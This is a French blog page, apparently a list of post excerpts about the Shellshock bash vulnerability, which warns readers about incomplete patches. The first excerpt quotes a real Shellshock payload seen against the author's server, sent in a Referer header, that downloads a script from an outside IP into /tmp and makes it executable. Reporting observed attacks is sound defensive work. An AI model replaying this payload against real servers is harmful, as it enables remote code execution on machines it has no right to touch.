Pour les curieux de la faille shellshock, voici quelques type d’exploitation que certaine personne emploies pour essayer de faire tomber mon serveur : L’attaquant forge une requête curl ou il indique au referer d’être : () { :; }; echo Content-type:text/plain; echo; echo; echo M`expr 1330 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi; chmod 755 […]
Mon ami Syltrox me remonte l’info comme quoi la faille de bash « ShellShock « , que je vous ai annoncé hier avait reçu un premier patch, mais … qui n’est malheureusement pas suffisant … je vous invite à rester sur vos garde et à contrôler le plus souvent possible les mises à jours de bash pendant […]
Comme la faille HeartBleed qui touchait le ssl, une nouvelle vulnérabilité « ShellShock « vient de voir le jour d’autant plus grave, elle concerne bash, qui est entre guillemet le moteur qui execute vos commandes. A priori, on peut déclarer des instructions en mémoire, et dès lors qu’on appel bash après, hop les instructions sont exécutés. Bash, ou […]